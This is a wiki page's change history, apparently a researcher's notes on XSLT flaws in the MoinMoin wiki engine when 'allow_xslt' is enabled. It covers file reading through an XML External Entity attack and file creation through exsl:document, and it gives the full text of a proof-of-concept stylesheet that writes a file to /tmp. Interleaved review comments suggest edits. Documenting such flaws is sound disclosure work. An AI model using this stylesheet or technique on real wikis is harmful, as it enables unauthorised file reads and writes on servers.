Changes for page Application_MoinMoin

Last modified by Nicolas Gregoire on 2012/01/29 17:56

From version 3.1
edited by Nicolas Gregoire
on 2012/01/24 22:08
Change comment: Upload new attachment XsltReadFile
To version 4.1
edited by Nicolas Gregoire
on 2012/01/24 22:20
Change comment: There is no comment for this version

Page properties
Content
... ... @@ -1,7 +1,23 @@
1 -By default, the 'allow_xslt' configuration option is set to False. if this option is set to True, then "read/write/overwrite arbitrary path/file as the moin process uid/gidarbitrary" is possible. This is triggered by inserting then displaying wiki pages containing XSLT code.
1 += Introduction =
2 2  
3 +Dixit [[Wikipedia>>http://en.wikipedia.org/wiki/Moinmoin]], "MoinMoin is a wiki engine implemented in Python, initially based on the PikiPiki wiki engine. The MoinMoin code is licensed under the GNU General Public License v2, or (at the user's option) any later version (except some 3rd party modules that are licensed under other Free Software licenses compatible with the GPL). A number of organizations use MoinMoin to run public wikis, including notable free software projects Ubuntu, Apache, Debian, FreeBSD, and others."
3 3  
4 -This was documented in version 1.9.3 :
5 += Vulnerabilities =
6 +
7 +By default, the 'allow_xslt' configuration option is set to False. __If__ this option is set to True, then "read/write/overwrite arbitrary path/file as the moin process uid/gidarbitrary" is possible. These bugs are triggered by inserting then displaying wiki pages containing XSLT code.
8 +
9 +
10 +This behavior was documented in version 1.9.3 :
5 5  http://moinmo.in/SecurityFixes
6 6  http://hg.moinmo.in/moin/1.9/rev/99e2309a7ec0
7 7  
14 += File disclosure =
15 +
16 +Using a XML External Entity attack, it is possible to read text files ([[PoC>>attach:XsltReadFile]]).
17 +
18 +__Note__ : I was unable to abuse the doc-as-string() extension function because of the MoinMoin URL Resolver. I didn't soend much time on it, given that a XEE vulnerability was already found.
19 +
20 += File creation =
21 +
22 +As described in the [[4Suite>>Engine_4Suite]] page, the <exsl:document> extension element allows file creation ([[PoC>>attach:XsltCreateFile]])
23 +
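Review bot: Typos in the added text should be fixed: new line 7 carries over "uid/gidarbitrary" from the old line 1 (the trailing "arbitrary" looks like a stray word fused onto "uid/gid", worth checking against the wording at the SecurityFixes link), and new line 18 has "soend" for "spend". Lines 16 and 18 also refer to the same issue as "XML External Entity" and "XEE"; pick one abbreviation and use it in both places. The File creation sentence on line 22 is missing its closing period. Since the Vulnerabilities section says these bugs are only possible when 'allow_xslt' is set to True, consider adding one sentence there stating that leaving the option at its default of False is the mitigation for both the File disclosure and File creation cases, so readers get the fix alongside the PoC links.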
XsltCreateFile
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +438 bytes
Content
... ... @@ -1,0 +1,13 @@
1 +<?xml version="1.0"?>
2 +<?xml-stylesheet href="XsltCreateFile" type="text/xml"?>
3 +<xsl:stylesheet version="1.0"
4 +xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
5 +xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl" >
6 + <xsl:template match="/">
7 + Writing to disk ...
8 + <exsl:document href="file:///tmp/dropped_by_moin" method="text">
9 + Dropped to disk
10 + </exsl:document>
11 + </xsl:template>
12 +</xsl:stylesheet>
13 +
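Review bot: The attachment documents neither its precondition nor its side effect. After the XML declaration, add an XML comment saying that the stylesheet only has an effect when 'allow_xslt' is True and that it leaves a file at the href given on line 8 (file:///tmp/dropped_by_moin), so anyone running it on a test instance knows what to look for and what to remove afterwards. The xml-stylesheet href on line 2 is the attachment's own name, so the file stops working if it is saved or attached under a different name; a note on that would help too. The literal text on line 7 sits outside the exsl:document element and will appear in the rendered page rather than in the written file; say in the comment whether that is intended as a visible marker.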